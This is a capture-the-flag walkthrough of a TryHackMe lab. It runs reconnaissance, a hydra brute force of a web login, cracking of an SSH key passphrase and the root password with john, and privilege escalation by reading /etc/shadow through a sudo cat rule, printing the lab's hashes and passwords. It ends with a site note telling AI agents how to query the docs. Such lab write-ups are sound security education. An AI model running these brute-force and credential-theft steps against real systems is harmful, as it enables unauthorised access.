# Brute It

**Date:** 09 November, 2021

**Author:** Dhaval Kotak

**Room:** [Brute It](https://tryhackme.com/room/bruteit)

## Reconnaissance

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ nmap -A 10.10.87.211 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 12:20 IST
Nmap scan report for 10.10.87.211
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.48 seconds
```

How many ports are open?

**2**

What version of SSH is running?

**OpenSSH 7.6p1**

What version of Apache is running?

**2.4.29**

Which Linux distribution is running?

**Ubuntu**

Search for hidden directories on web server.

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ gobuster dir -u http://10.10.87.211 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.87.211
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/09 12:24:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.87.211/admin/]
/index.html           (Status: 200) [Size: 10918]                               
/server-status        (Status: 403) [Size: 277]                                 
                                                                                
===============================================================
2021/11/09 12:27:18 Finished
===============================================================
```

What is the hidden directory?

**/admin**

## Getting A Shell

We find the username of SSH in a comment while looking at the page source&#x20;

```html
<!-- Hey john, if you do not remember, the username is admin -->
```

Now lets brute force the login page with hydra

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️  hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.87.211 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-09 12:33:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.87.211:80/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid
[80][http-post-form] host: 10.10.87.211   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-09 12:33:42
```

Explaination :

`-l admin` : Specifying the username

`-P /usr/share/wordlists/rockyou.txt` : Specifying the password dictionary

`10.10.87.211` : The Target IP

`http-post-form` : The type of attack protocol

`/admin` : The directory of the form

`user=^USER^&pass=^PASS^` : The login response from the form

`Username or password invalid` : The login message if the login failed

What is the user:password of the admin panel?

**admin:xavier**

Crack the RSA key you found.

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ sudo python3 /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll       (id_rsa)
1g 0:00:00:04 52.40% (ETA: 12:37:06) 0.2487g/s 1888Kp/s 1888Kc/s 1888KC/s hippy3245667
Session aborted
```

What is John's RSA Private Key passphrase?

**rockinroll**

User.txt

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ ssh john@10.10.87.211 -i id_rsa 
The authenticity of host '10.10.87.211 (10.10.87.211)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.211' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov  9 07:09:27 UTC 2021

  System load:  0.0                Processes:           103
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 39%                IP address for eth0: 10.10.87.211
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{REDACTED}
```

Web flag

**You will get the flag when you login with the credentials found by hydra**&#x20;

## **Privilege Escalation**

Find a form to escalate your privileges.

```shell
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
```

We can use `cat` as a root user without any password. So lets `cat` the `/etc/shadow` file.

```shell
john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
...
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
```

Using john to crack the root hash

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ john root-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
football         (root)
1g 0:00:00:04 DONE 2/3 (2021-11-09 12:49) 0.2309g/s 711.3p/s 711.3c/s 711.3C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

What is the root's password?

**football**

root.txt

```shell
root@bruteit:/home/john# cd /root
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt 
THM{REDACTED}
root@bruteit:~# 
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dhaval-kotak.gitbook.io/ctfs/brute-it.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.